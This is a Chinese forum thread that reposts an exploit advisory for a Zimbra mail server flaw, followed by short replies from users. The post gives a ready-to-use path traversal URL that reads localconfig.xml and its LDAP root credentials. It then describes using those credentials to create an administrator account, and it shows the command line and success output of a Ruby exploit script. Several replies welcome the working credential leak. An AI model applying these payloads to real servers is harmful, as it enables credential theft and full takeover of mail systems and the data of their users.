C4r1st 发表于 2014-1-26 11:24:56

Zimbra – 0day exploit / Privilegie escalation via LFI


# Exploit Title: Zimbra 0day exploit / Privilegie escalation via LFI
# Date: 06 Dec 2013
# Exploit Author: rubina119
# Contact Email : rubina119gmail.com
# Vendor Homepage: http://www.zimbra.com/
# Version: 2009, 2010, 2011, 2012 and early 2013 versions are afected,
# Tested on: Centos(x), Ubuntu.
# CVE : No CVE, no patch just 0Day
# State : Critical

# Mirror: http://www.exploit-db.com/sploits/zimbraexploit_rubina119.zip

---------------Description-----------------

This script exploits a Local File Inclusion in
/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz
which allows us to see localconfig.xml
that contains LDAP root credentials wich allow us to make requests in
/service/admin/soap API with the stolen LDAP credentials to create user
with administration privlegies
and gain acces to the Administration Console.

LFI is located at :
/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00

Example :

http://mail.example.com/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00

or

http://mail.example.com:7071/zimbraAdmin/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00

----------------Exploit-----------------

Before use this exploit, target server must have admin console port open
"7071" otherwise it won't work.

use the exploit like this :

ruby run.rb -t mail.example.com -u someuser -p Test123_23

[*] Looking if host is vuln....
[+] Host is vuln exploiting...
[+] Obtaining Domain Name
[+] Creating Account
[+] Elevating Privileges
[+] Login Credentials
[*] Login URL : http://mail.example.com:7071/zimbraAdmin/
[*] Account : someuser@example.com
[*] Password : Test123_23
[+] Successfully Exploited !

The number of servers vuln are huge like 80/100.

This is only for educational purpouses.
**** Hidden Message *****

gty48 发表于 2014-1-26 11:35:27

我是沙发

blck 发表于 2014-1-26 11:54:11

不错,看看。。。

blck 发表于 2014-1-26 11:55:34

LFI,直接爆出的password

fenglail 发表于 2014-1-26 12:04:29

看看,研究一下

Diana 发表于 2014-1-26 14:11:21

就知道是这样滴~

whc 发表于 2014-1-26 17:26:50

赶紧看下

keerol 发表于 2014-1-26 20:54:32

不错,看看

LostSoul 发表于 2014-1-27 07:36:59

{:2_32:}{:2_32:}{:2_32:}{:2_32:}{:2_32:}{:2_32:}{:2_32:}

Andre 发表于 2014-1-27 11:27:11

学习了,谢谢楼主分享
页: [1]
查看完整版本: Zimbra – 0day exploit / Privilegie escalation via LFI